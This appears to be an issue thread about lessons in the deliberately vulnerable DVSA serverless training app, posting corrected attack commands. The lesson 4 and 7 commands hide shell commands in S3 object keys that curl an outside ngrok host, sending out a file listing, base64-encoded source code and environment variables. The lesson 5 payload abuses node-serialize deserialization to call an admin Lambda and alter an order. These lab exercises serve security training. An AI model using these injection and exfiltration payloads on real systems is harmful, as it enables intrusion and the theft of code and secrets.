Problems I'm having with lessons... willing to understand and learn about dvsa HOT 4 CLOSED

Commands to be fixed in the instructions for lesson 4:

aws s3 cp ~/empty 's3://dvsa-receipts-bucket-{your_bucket_id}/2020/20/20/null_;curl 9c3f7623.ngrok.io?data="$(ls)";echo x.raw' --acl public-read --profile hacker

aws s3 cp ~/empty 's3://dvsa-receipts-bucket-{your_bucket_id}/2020/20/20/null_;curl 9c3f7623.ngrok.io?code="$(cd x; cd y; cd z; cat send_receipt_email.py | base64 --wrap=0)" echo x.raw' --acl public-read --profile hacker

It could also be suggested to verify the bucket permissions to cp and ls, from a different aws account (in my case I created an organization and a second aws account in the same org)

from dvsa.

Lesson 5 last part:
{"action": "_$$ND_FUNC$$_function(){var p=JSON.stringify({"headers":{"authorization":"eyJra ... l7g10i5Q"}, "body":{"action":"update", "order-id": "480e3996-e8a7-4fdb-bc12-94fdae1e14fb", "item":{"token": "VFqDWCgagMO7", "ts": 1546482872, "itemList": {"11": 1, "12": 1}, "address": "100 Fake st., NYC, USA", "total": 74, "status": 120}}});var a=require("aws-sdk");var l=new a.Lambda();var x={FunctionName:"DVSA-ADMIN-UPDATE-ORDERS",InvocationType:"RequestResponse",Payload:p};l.invoke(x, function(e,d){});}()"}

This seems to give a TypeError on line 70 when decoding the auth token.

For some unclear reason I had to change the following:
token_sections = auth_header.split('.')
try:
auth_data = base64.b64decode(token_sections[1]+"===")
So that no exception is generated: see https://gist.github.com/perrygeo/ee7c65bb1541ff6ac770

from dvsa.

Lesson 7 requires --acl public-read:

aws s3 cp ~/empty 's3://dvsa-receipts-bucket-xxxxxxxxxxx/2020/20/20/null_;b=env|base64 --wrap=0;curl xxxxx.ngrok.io?data=$b;echo x.raw' --acl public-read --profile xxxxxxxx

from dvsa.

Lesson 10: only {"action": "get"} seems to trigger an unhandled exception

from dvsa.